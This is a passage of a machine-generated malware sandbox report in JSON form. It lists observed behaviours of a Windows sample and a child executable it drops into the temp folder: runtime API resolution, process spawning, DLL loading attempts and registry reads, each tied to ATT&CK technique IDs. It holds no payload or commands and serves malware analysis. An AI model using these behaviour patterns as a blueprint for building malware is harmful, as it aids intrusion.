GetCurrentPackageId (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005884)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004308)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"CreateProcessW\" with parameter \":*C:\\10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe *\" - (UID: 00000000-00005884)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZUUZZG\" - (UID: 00000000-00005500)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" has an writable section named \".data\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" has an writable section named \".bss\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" has an writable section named \".idata\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" has an writable section named \".CRT\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" has an writable section named \".tls\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70100000\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" loaded module \"KERNEL32\" at base 757b0000\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74bc0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70100000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"KERNEL32\" at base 757b0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74bc0000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 74a50000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 76fb0000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 75d50000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 74d20000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71110000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 74e50000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 76f60000\n \"085cda53603755dc.exe\" loaded module \"OLE32.DLL\" at base 75510000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d40000\n \"085cda53603755dc.exe\" loaded module \"ADVAPI32.DLL\" at base 75670000\n \"085cda53603755dc.exe\" loaded module \"KERNEL32.DLL\" at base 757b0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005884)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004308)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004308)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FB0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FB0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80 ...\" (UID: 00000000-00005500)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZUUZZG\" (UID: 00000000-00004308)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80 ...\" (UID: 00000000-00005500)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZUUZZG\" (UID: 00000000-00004308)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" was detected as \"MinGW\" and name: \"Compiler\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004308]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": 